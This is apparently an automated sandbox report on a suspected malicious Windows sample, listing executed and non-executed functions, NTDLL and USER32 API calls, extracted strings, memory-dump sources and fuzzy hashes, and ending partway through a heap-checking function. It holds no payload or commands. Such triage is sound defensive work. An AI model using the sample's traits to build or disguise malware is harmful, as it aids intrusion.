Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	12.2%
Total number of Nodes:	148
Total number of Limit Nodes:	13

Executed Functions

Function 00C88523 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Y, xrefs: 00C88816
Y, xrefs: 00C88892

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID:
String ID: Y$Y
API String ID: 0-2138293467
Opcode ID: 8e4906e2d5e99ad5260989d8b7096b1b22ad3f58aa727d9f142021b6cc74f9ad
Instruction ID: 7c816eb51edc9cd2f335f25cfa04cc75889e2403ac61bd0898c5614b1e355fa0
Opcode Fuzzy Hash: 8e4906e2d5e99ad5260989d8b7096b1b22ad3f58aa727d9f142021b6cc74f9ad
Instruction Fuzzy Hash: 80F1D1B0D0020AAFDF24EF94C885BFEB7B8AF44304F548199E419A7241DB30AE45DFA5

Function 00C876C3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C87735

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 0129722dafb6d8cf01b0bff337b9f84be773681681b2ea2a05b68a00b5dda872
Instruction ID: 33722484dec4adab6c2336789f42877c22a6e6524aa94521fae348f3695d374f
Opcode Fuzzy Hash: 0129722dafb6d8cf01b0bff337b9f84be773681681b2ea2a05b68a00b5dda872
Instruction Fuzzy Hash: BF0125B5D0020DABDF10EBE4DC46F9DB7789B54308F1481A5F918A7140F631EB55DB91

Function 00C9C5E3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,00C8628F,001F0001,?,00000000,?,?,00000104), ref: 00C9C61A

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 666be8ed16e7e4d4ed24a04b877a4ea5a0b2a04f6b52331af6171379bcb58c02
Instruction ID: 8240391d4b809155682f3c8106ae70fe3d072d9ef00cac0636e8222c7abba952
Opcode Fuzzy Hash: 666be8ed16e7e4d4ed24a04b877a4ea5a0b2a04f6b52331af6171379bcb58c02
Instruction Fuzzy Hash: D9E08C362012047BE620FA9ADC02F9B776CDFC5710F108459FA08A72C2C771BA1187F1

Function 00EE2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00EE2B6A

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 969dffde337c04196f1d5ee2b1eb4c4fbc7d460fbbeed8aa607ad2fdd17d6513
Instruction ID: 0ca702427ccc991e7f75510ecd75f83c8ad008dfe30f448fac58b6f206ff7d1d
Opcode Fuzzy Hash: 969dffde337c04196f1d5ee2b1eb4c4fbc7d460fbbeed8aa607ad2fdd17d6513
Instruction Fuzzy Hash: 8490027120280403464571584515626400AC7E1301B55D032E2015590DCA25C9A16125

Function 00EE2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00EE2C7A

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 916b8f88208fc3ca8e1db91519c450864a99e3938172a88fa5441dc072a39c1a
Instruction ID: 07d333af7465800ff6d0e7b24c310682736e3d6791e8d26a333a6eb73374a363
Opcode Fuzzy Hash: 916b8f88208fc3ca8e1db91519c450864a99e3938172a88fa5441dc072a39c1a
Instruction Fuzzy Hash: B390023120188C02D6507158850575A0005C7D1301F59D422A5425658D8B95C9A17121

Function 00EE2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00EE2DFA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2f4248272c18993d583d7beaa9d040a86f12105ed13aa650f5fdf561c38ecf1
Instruction ID: 3860c36d25e5884209117a2fd26e2d5af0d055a659a37ff5462c15c67e6a7134
Opcode Fuzzy Hash: e2f4248272c18993d583d7beaa9d040a86f12105ed13aa650f5fdf561c38ecf1
Instruction Fuzzy Hash: 5F90023120180813D651715846057170009C7D1341F95D423A1425558D9B56CA62A121

Function 00EE35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00EE35CA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fbebed308fd160044df3c05f214077eaa9ee09d05a4860a2fe13911d386a9c38
Instruction ID: 2e95c962358a1cd183726470881d47aa0572d0869a72d48e7df83576dd030498
Opcode Fuzzy Hash: fbebed308fd160044df3c05f214077eaa9ee09d05a4860a2fe13911d386a9c38
Instruction Fuzzy Hash: 9390023160590802D640715846157161005C7D1301F65D422A1425568D8B95CA6165A2

Function 00C83F08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(220i73Hn,00000111,00000000,00000000), ref: 00C83F8A

Strings

220i73Hn, xrefs: 00C83F7F, 00C83F89, 00C83F9A
220i73Hn, xrefs: 00C83F91, 00C83F94

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 220i73Hn$220i73Hn
API String ID: 1836367815-1753713641
Opcode ID: e01e1d592bdb9874811a2e7f3471f83aca5c3423cb5631741a93713d25d05bdb
Instruction ID: 8c3f39dbb5ef3fd89e563d6f7ee1afad00f44e6e4c52ffa35bb54efbb9b65a96
Opcode Fuzzy Hash: e01e1d592bdb9874811a2e7f3471f83aca5c3423cb5631741a93713d25d05bdb
Instruction Fuzzy Hash: 22118272D41148BADB10AAE49C85DEFBB7CEF40798F018165FA14A7101D6749F068BF1

Function 00C83F13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(220i73Hn,00000111,00000000,00000000), ref: 00C83F8A

Strings

220i73Hn, xrefs: 00C83F7F, 00C83F89, 00C83F9A
220i73Hn, xrefs: 00C83F91, 00C83F94

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 220i73Hn$220i73Hn
API String ID: 1836367815-1753713641
Opcode ID: 51b80e679377405a98036f73c067e772376af1f0d453a72b1edc3d32ec226ebf
Instruction ID: 3f224bda39ceef9a25f9c870e7a30ea32a700d503e2768e01da8b41262677182
Opcode Fuzzy Hash: 51b80e679377405a98036f73c067e772376af1f0d453a72b1edc3d32ec226ebf
Instruction Fuzzy Hash: ED01D672D0024CBADB00AAE48C82EEFBB7CDF40798F008064FA14A7101E6745F068BF1

Function 00C9C963 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,89F8458B,00000007,00000000,00000004,00000000,00C86F4C,000000F4), ref: 00C9C99F

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e8a0203cd85bf1bca43fb1e06c4b5f7719fb2da0334a461ea2c02b149f9439a6
Instruction ID: 98a8d3857e7c0f6841d734fdac19c4b007fff619aa0d9d42201fc9ae25e8fc8e
Opcode Fuzzy Hash: e8a0203cd85bf1bca43fb1e06c4b5f7719fb2da0334a461ea2c02b149f9439a6
Instruction Fuzzy Hash: B4E09272204204BBD614EE99EC41FEB37ACDFC8711F004019F909A7282D670B9108BB4

Function 00C9C913 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00C8E504,?,?,00000000,?,00C8E504,?,?,?), ref: 00C9C952

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d02f2d897a4512d463d0b5422d8ff550783a63ed69fc57f5fd664c584b7587ab
Instruction ID: a338f554c24de9ff85799ba33e015d3e35940fafc16fafdcecd4b55b2a84d379
Opcode Fuzzy Hash: d02f2d897a4512d463d0b5422d8ff550783a63ed69fc57f5fd664c584b7587ab
Instruction Fuzzy Hash: 1CE092726043087BD614EE98EC41F9B77ACDFC4750F008419FA08A7282C771B910C7B4

Function 00C9C9B3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,7E39879F,?,?,7E39879F), ref: 00C9C9EA

Memory Dump Source

Source File: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.1907217407.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_alWUxZvrvU.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 22dcb0925c6946b7ae2eaf67023c123b0aa6de5a1ee9ab0d2472473632c7df0e
Instruction ID: c0d684c670e14af355378dd1a92757dd664accf61562b6f92e00e3044c129597
Opcode Fuzzy Hash: 22dcb0925c6946b7ae2eaf67023c123b0aa6de5a1ee9ab0d2472473632c7df0e
Instruction Fuzzy Hash: 8AE086316442047BD620EE99DC01F9B775CDFC5750F008419FA0CA7282C770B91187F0

Function 00EE2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00EE2C24

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd807199626647c1ac2221880cdf45963c8421597ff285af4fd05303080b3d29
Instruction ID: 49aa35f0bc4cdfb51725bd5f05dcabe16e4b91554bd2f7f4d8f3ac069095ab86
Opcode Fuzzy Hash: fd807199626647c1ac2221880cdf45963c8421597ff285af4fd05303080b3d29
Instruction Fuzzy Hash: 95B09B719019C9C5DF51E760470971B7914A7D1705F25D076D3031641E4738C5D1F175

Non-executed Functions

Function 00F22349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00F23187
LdrpInitializeExecutionOptions, xrefs: 00F2317D
UseImpersonatedDeviceMap, xrefs: 00F2251C
DisableHeapLookaside, xrefs: 00F2246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 00F23176
@, xrefs: 00F22B74
MaxLoaderThreads, xrefs: 00F224EC
CFGOptions, xrefs: 00F22967
GlobalFlag2, xrefs: 00F22FC0
ShutdownFlags, xrefs: 00F224A1
RaiseExceptionOnPossibleDeadlock, xrefs: 00F22579
MinimumStackCommitInBytes, xrefs: 00F22BB0
UnloadEventTraceDepth, xrefs: 00F224C0
MaxDeadActivationContexts, xrefs: 00F22D82
FrontEndHeapDebugOptions, xrefs: 00F22489
@, xrefs: 00F22942
ExecuteOptions, xrefs: 00F225A0
GlobalFlag, xrefs: 00F22F3F, 00F23059
DisableExceptionChainValidation, xrefs: 00F2275F
TracingFlags, xrefs: 00F22549

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 9bd98877f3813649dd57bd327246de6d77d33118afa94289adbee0f9fdafbd4b
Instruction ID: 1fba8876ab0ec73daeaa821fb59f31b5fee3b5338ec23a36b4545957a4a13d73
Opcode Fuzzy Hash: 9bd98877f3813649dd57bd327246de6d77d33118afa94289adbee0f9fdafbd4b
Instruction Fuzzy Hash: 6992BF71A08361AFD760DF24D881B6BB7E8FB84720F04491DFA84E7291D774E944EB92

Function 00E968B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

SE_InstallAfterInit, xrefs: 00E9694B
SE_LdrEntryRemoved, xrefs: 00E969D2
minkernel\ntdll\ldrinit.c, xrefs: 00EF9BC3
SE_ProcessDying, xrefs: 00E969FF
SE_InstallBeforeInit, xrefs: 00E9691E
Could not locate procedure "%s" in the shim engine DLL, xrefs: 00EF9BB3
SE_DllUnloaded, xrefs: 00E969A5
LdrpGetShimEngineInterface, xrefs: 00EF9BB9
SE_DllLoaded, xrefs: 00E96978
SE_GetProcAddressForCaller, xrefs: 00E96A59
ApphelpCheckModule, xrefs: 00E96A86
TG, xrefs: 00E96987, 00E96AF6, 00E9698A
SE_ShimDllLoaded, xrefs: 00E968F1
SE_LdrResolveDllName, xrefs: 00E96A2C
SE_InitializeEngine, xrefs: 00E968C5

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$TG$minkernel\ntdll\ldrinit.c
API String ID: 0-3742277251
Opcode ID: a3e93bdc641da1a0e39c3d950d306371e1076d107286fbcb9ad571ab2fa9bc63
Instruction ID: 8f1c0d7fafc0db905d4507e79d5e8462eac45ea470a2e0cf6d98c65d37ef7202
Opcode Fuzzy Hash: a3e93bdc641da1a0e39c3d950d306371e1076d107286fbcb9ad571ab2fa9bc63
Instruction Fuzzy Hash: 28811BB2D0661DBB8B11EBA8EDD5EEE77EDAB04750B055423B940FB111E720DE049BA0

Function 00F45910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON

Download Yara Rule

Strings

LanguageConfigurationPending, xrefs: 00F46221
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00F4635D
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F45FE1
@, xrefs: 00F46277
@, xrefs: 00F46027
Control Panel\Desktop, xrefs: 00F4615E
PreferredUILanguagesPending, xrefs: 00F461D2
PreferredUILanguages, xrefs: 00F463D1
InstallLanguageFallback, xrefs: 00F46050
@, xrefs: 00F461B0
LanguageConfiguration, xrefs: 00F46420
@, xrefs: 00F4647A
@, xrefs: 00F463A0
*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 00F45A84

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1325123933
Opcode ID: 8f68b65ca775d9311f71d0d7e898d10fda1dc64496720c8718a73d96a38ee2c9
Instruction ID: c8382b363f20f6fc7884ffc01b281151c414c4aa6f768c497ffe8c9b74b43666
Opcode Fuzzy Hash: 8f68b65ca775d9311f71d0d7e898d10fda1dc64496720c8718a73d96a38ee2c9
Instruction Fuzzy Hash: CA7278729087419BD321DF28C880BABBBE9FF88B14F44492DF989D7251E730D905DB92

Function 00ED8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

double initialized or corrupted critical section, xrefs: 00F15508
undeleted critical section in freed memory, xrefs: 00F1542B
8, xrefs: 00F152E3
Address of the debug info found in the active list., xrefs: 00F154AE, 00F154FA
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F154CE
Thread identifier, xrefs: 00F1553A
Critical section address, xrefs: 00F15425, 00F154BC, 00F15534
Invalid debug info address of this critical section, xrefs: 00F154B6
Thread is in a state in which it cannot own a critical section, xrefs: 00F15543
Critical section address., xrefs: 00F15502
Critical section debug info address, xrefs: 00F1541F, 00F1552E
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F1540A, 00F15496, 00F15519
corrupted critical section, xrefs: 00F154C2
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F154E2

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: cb327c41513eb6d7ac0c3ca4a0f27323e0904a613bd2777781d26c1a82225136
Instruction ID: 20d3f82a41c2d882b3cdb2211405c1f04ec6e538e4306fc0739a04017157a4e6
Opcode Fuzzy Hash: cb327c41513eb6d7ac0c3ca4a0f27323e0904a613bd2777781d26c1a82225136
Instruction Fuzzy Hash: 5981AEB1E40758EFDB20CF94C941BAEBBB5FB48B14F24511AF918B7280D771A981DB50

Function 00ED29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00F12498
@, xrefs: 00F1259B
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00F124C0
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00F122E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00F12409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00F12506
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00F125EB
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00F12602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00F12624
RtlpResolveAssemblyStorageMapEntry, xrefs: 00F1261F
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00F12412

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 4f1f6e058cfbe7a9e3a3b36597b8694ffcc3b7685d3fef6641bf719cab72c864
Instruction ID: 436fff705177a0b8be36cee8c4e6d55721af64b18a24f3be65cae5a62cc0a78f
Opcode Fuzzy Hash: 4f1f6e058cfbe7a9e3a3b36597b8694ffcc3b7685d3fef6641bf719cab72c864
Instruction Fuzzy Hash: 22028FB1D002289BDB60DB54CC81BDEB7B8AB54314F1051EAA70DB7282EB309EC5DF59

Function 00ED0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

l, xrefs: 00ED0FC4
%%%u, xrefs: 00F114CC
w, xrefs: 00ED0FBA
9, xrefs: 00ED0F9C
h, xrefs: 00ED0FB0
, xrefs: 00ED0FEC
!, xrefs: 00ED0FA6
0, xrefs: 00ED0F92
%, xrefs: 00ED0F7E
%%%u!%s!, xrefs: 00F114A1

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 1878524bad11381398877f5512e60ad3c1e85e7436f7de40da4ed5e237e3dab9
Instruction ID: e72c77093a692b619369b1bd32f20e0a2ea86b8c4b276a61be3ed9b9f1171ddd
Opcode Fuzzy Hash: 1878524bad11381398877f5512e60ad3c1e85e7436f7de40da4ed5e237e3dab9
Instruction Fuzzy Hash: 326257B5E002299FDB24DF18C8417E9B7B6BF95320F5482DAE549AB280D7325EE1DF40

Function 00E9D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 00E9D663
@, xrefs: 00E9D3E9
Control Panel\Desktop\MuiCached, xrefs: 00E9D62B
Control Panel\Desktop, xrefs: 00E9D45D
PreferredUILanguagesPending, xrefs: 00EFA8DE
@, xrefs: 00E9D49D
PreferredUILanguages, xrefs: 00E9D4B8, 00E9D4C5
MachinePreferredUILanguages, xrefs: 00E9D685
H/, xrefs: 00E9D5CA
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00E9D3B6

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-1634445154
Opcode ID: 367dcc8560c2ddcd7658c42e2cb91ae63bba2b42a321e3d758820148c7da5e78
Instruction ID: 93c01ca0e7da6bd6e59af9b44fd50ffacff425ce3b97cd9cca22d5d48f2cabe2
Opcode Fuzzy Hash: 367dcc8560c2ddcd7658c42e2cb91ae63bba2b42a321e3d758820148c7da5e78
Instruction Fuzzy Hash: 00B19EB250C3659FCB15DF24C840AABB7E8AF84758F05692EF989F7241D770DD048B92

Function 00F48B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

heapType, xrefs: 00F48BCB
SegmentHeap, xrefs: 00F48BE9
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 00F48BD0
runtimebroker.exe, xrefs: 00F48B73
lsass.exe, xrefs: 00F48BA1
csrss.exe, xrefs: 00F48B80
smss.exe, xrefs: 00F48B8B
DefaultBrowser_NOPUBLISHERID, xrefs: 00F48D00
services.exe, xrefs: 00F48B96
svchost.exe, xrefs: 00F48B68

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 2a1abb0adb9e05d561a0a397bf1663d0746b60725af617ea4289c50b18596abe
Instruction ID: 20fa6083a14f83bc8443bf397b6f0fe08ca2403ada78f47fc6430ff243fb9481
Opcode Fuzzy Hash: 2a1abb0adb9e05d561a0a397bf1663d0746b60725af617ea4289c50b18596abe
Instruction Fuzzy Hash: 7851E0719093159BC324CF14C885BAFBFE8EF84390F14491EBD9983281EB70D906D7A2

Function 00F512ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 00F518A5
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 00F518F8
Free Heap block %p modified at %p after it was freed, xrefs: 00F5171B
